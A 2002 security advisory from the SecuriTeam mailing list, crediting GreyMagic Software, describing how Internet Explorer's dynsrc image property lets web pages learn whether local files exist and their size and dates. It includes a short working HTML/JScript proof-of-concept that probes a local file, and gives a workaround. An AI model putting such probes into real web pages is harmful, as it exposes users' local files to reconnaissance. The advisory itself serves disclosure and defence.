[NT] Retrieving Information on Local Files Via Internet Explorer

From: support@securiteam.com
Date: 03/28/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 28 Mar 2002 13:22:23 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Retrieving Information on Local Files Via Internet Explorer
------------------------------------------------------------------------

SUMMARY

The <img> element is commonly used to present images on an HTML document.
However, it also contains a feature that allows it to present other types
of media, such as VRML, AVI, MPEG, etc. This feature was implemented in
the form of a property named dynsrc.

A security vulnerability arises from this, since it allows gaining of
sensitive information on locally residing files on the client's end of the
computer (such as the existence of files, their size, date of
modification, etc).

DETAILS

Affected applications:
All tested versions of Microsoft Internet Explorer (IE5+); prior versions
may be vulnerable as well.
Internet Explorer 5 SP2
Internet Explorer 5.5 SP2
Internet Explorer 6 SP1

The problem lies within the dynsrc property's implementation, which
completely ignores the source validity and gives script access to the
assigned file even if it is not presentable.

Once a file name has been assigned to the dynsrc property it is possible
to see whether it exists by checking the fileSize property of the <img>
element, if the return value is -1 then it is certain that the file does
not exist, any greater value indicates that the file exists.

When a file has been known to exist it is possible to extract additional
information from the <img> element.

Such as:
 * The file size in bytes, using the fileSize property.
 * The date the file was created, using the fileCreatedDate property.
 * The date the file was last modified, using the fileModifiedDate
property.
 * The date the file was last updated, using the fileUpdatedDate property.

A malicious attacker may use this bug in conjunction with other bugs to
detect files or determine whether the user has specific programs (and even
specific versions, according to size) installed, etc.

Exploit:
This simple example demonstrates how the bug is used to check whether
"c:/test.txt" exists and retrieves its additional properties if it does.

<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
setTimeout(
        function () {
                alert(
                        oFile.fileSize>-1 ?
                                "File exists!\n\n"+
                                "Size: "+oFile.fileSize+" bytes.\n"+
                                "Created: "+oFile.fileCreatedDate+".\n"+
                                "Modified: "+oFile.fileModifiedDate+".\n"+
                                "Updated: "+oFile.fileUpdatedDate+"."
                        :
                                "File does not exist."
                );
        },
        250
);
</script>

Solution:
Microsoft was first informed on 18 Feb 2002 (38 days ago), they have
opened an investigation regarding this issue and will probably release a
patch in the near future.

Until a patch becomes available, the only workaround is to disable Active
Scripting.

ADDITIONAL INFORMATION

The information has been provided by <mailto:security@greymagic.com>
GreyMagic Software.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.